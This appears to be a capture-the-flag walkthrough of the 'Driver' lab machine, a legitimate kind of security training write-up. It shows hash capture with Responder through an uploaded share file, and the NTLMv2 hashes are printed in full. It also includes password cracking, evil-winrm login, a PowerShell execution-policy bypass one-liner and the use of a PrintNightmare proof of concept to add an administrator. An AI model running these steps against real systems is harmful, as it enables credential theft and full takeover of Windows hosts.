# Enumeration
## NMAP
```txt
PORT     STATE SERVICE      REASON  VERSION
80/tcp   open  http         syn-ack Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        syn-ack Microsoft Windows RPC
445/tcp  open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 64178/tcp): CLEAN (Timeout)
|   Check 2 (port 21030/tcp): CLEAN (Timeout)
|   Check 3 (port 50164/udp): CLEAN (Timeout)
|   Check 4 (port 58897/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-03T11:35:01
|_  start_date: 2021-10-03T10:56:52
```

## Web
- Requires basic authentication.
- We can login using `admin:admin
- Domain name is driver.htb we can add to `/etc/hosts`
- IIS 10.0
- PHP 7.3.25

## SMB 
- Unable to list out shares. Access denied.

## Web (5985)
- Nothing interesting run directory brute-forcing.

# Exploit and stealing hashes via SCF
- We can upload a anything on the site. Maybe it's learning towards SCF file attacks?
- It is hinting towards that.
```txt
  Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
 ```
 - We name the file with @ to make sure it's at the top of the directory in the share.
 - Now we need to listen on responder
 ```bash
 sudo responder -wrf --lm -v -I tun0
 ```
 ```bash
 [SMB] NTLMv2 Client   : 10.129.229.250
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:3b6b8251504dcc79:F624A98443B9065CC13EA8A86E39F3C5:01010000000000006777BCA853B8D701E40E636F847CEA0D00000000020000000000000000000000
[SMB] NTLMv2 Client   : 10.129.229.250
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:8760dfd0f13fc726:E6D4F218B714BC3AEF6A9831510DBBE9:0101000000000000D89F5EA953B8D7019E70EC17867B10CD00000000020000000000000000000000
[SMB] NTLMv2 Client   : 10.129.229.250
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:c99f3a1692c94e24:69F9C5A8FBB4537BE1F6C3B7D1272F7A:0101000000000000B5AA00AA53B8D7011D570FF7AA7D5C8200000000020000000000000000000000
[SMB] NTLMv2 Client   : 10.129.229.250
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:96bfd1dd0a026917:209ED4E9E632150B40CC955AB732E593:01010000000000005EACACAA53B8D701E0E94BD83580A6C300000000020000000000000000000000
[SMB] NTLMv2 Client   : 10.129.229.250
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:4fb77328ba1afb1c:2AEC586FFCBD755073519EBCE567BACE:0101000000000000F4AF4EAB53B8D70167544AADE8F17E7800000000020000000000000000000000
[SMB] NTLMv2 Client   : 10.129.229.250
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:29b834fd4e706ea9:1C511BC956A8903FE563697F7B12ED0A:010100000000000096B7F0AB53B8D70106E545ED51F66FA200000000020000000000000000000000
[SMB] NTLMv2 Client   : 10.129.229.250
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:b7bfd6f5244b2bce:08251CFAD63840E93B68B1E65C73F8C4:0101000000000000896090AC53B8D701EE4F9ECE5B88FF6000000000020000000000000000000000
```
And we get a few hashes! This means that they visited the share.
- We get their hashes. But what can we do with it. We can try to crack them or authenticate via PTH.
- Let's make a list of users and hashes
```txt
tony:DRIVER:b7bfd6f5244b2bce:08251CFAD63840E93B68B1E65C73F8C4:0101000000000000896090AC53B8D701EE4F9ECE5B88FF6000000000020000000000000000000000
```
- I tried to authenticate using pass the hash in win-rm but it does not work.
 - We can try using a Metasploit module for this.
 `exploit/windows/smb/smb_relay`
 - We're getting access denied?
 `[*] Sending Access Denied to 10.129.230.36:49414 DRIVER\tony`
 - Let's try crack the hash.
 - We'll use John for this.
 - Password cracked is `liltony.`
 - Tried to RDP but failed but we can connect using evil-winrm
 `evil-winrm -i 10.129.230.36 -u tony -p liltony`
 ''
 # Privilege Escalation
 Since we're talking about drivers, I'm guessing we're exploiting CVE-2021-34527 which is about printers.
 - First check if the spooler service is running first.
 - After verifying the spooler service is active, we can try to use the [POC made by John Hammond and Caleb.](https://github.com/calebstewart/CVE-2021-1675)
 - We simply `Import-Module` the ps1 script right? Wrong.
 - There is an execution policy blocking us from running scripts.
 ```ps
 *Evil-WinRM* PS C:\Users\tony\Documents> Import-Module .\CVE-2021-1675.ps1
File C:\Users\tony\Documents\CVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
```
- Being the worst at Windows. I decided to find out how to bypass Execution Policies and I followed each step of this [article](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)
- Going down the list, the script ended up working at number 12 which is `Disable ExecutionPolicy by Swapping out the AuthorizationManager`
```ps
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}  Disable-ExecutionPolicy  .\CVE-2021-1675.ps1
```

```ps
*Evil-WinRM* PS C:\Users\tony\Documents> Import-Module .\CVE-2021-1675.ps1
```
- And we're not getting screamed at!
```bash
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
```
- And now we can login as an local administrator
`adm1n:P@ssw0rd`
- We have admin privileges.
